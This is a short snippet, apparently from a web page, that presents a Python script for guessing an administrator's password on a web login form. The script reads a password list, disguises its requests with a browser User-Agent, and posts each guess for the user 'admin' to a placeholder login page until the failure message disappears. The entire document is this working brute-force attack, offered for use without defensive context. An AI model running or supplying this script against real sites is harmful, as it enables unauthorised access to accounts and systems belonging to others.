Simple code for attempting to guess admin’s password for a web form login.
from requests import post
# Look like a real browser
HEADER = {“User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36″}
# Read in my password list
with open(“passwords.txt”) as fh:
passwords = fh.readlines()
# Try to guess
for password in passwords:
post_data = {‘user’: ‘admin’, ‘pass’: password.rstrip()}
response = post(‘https://website.com/loginpage.php’, post_data, headers=HEADER)
# This message could obviously change, depending on the site
if ‘The login is invalid.’ not in response.text:
print(f”Guessed! admin/{password}”)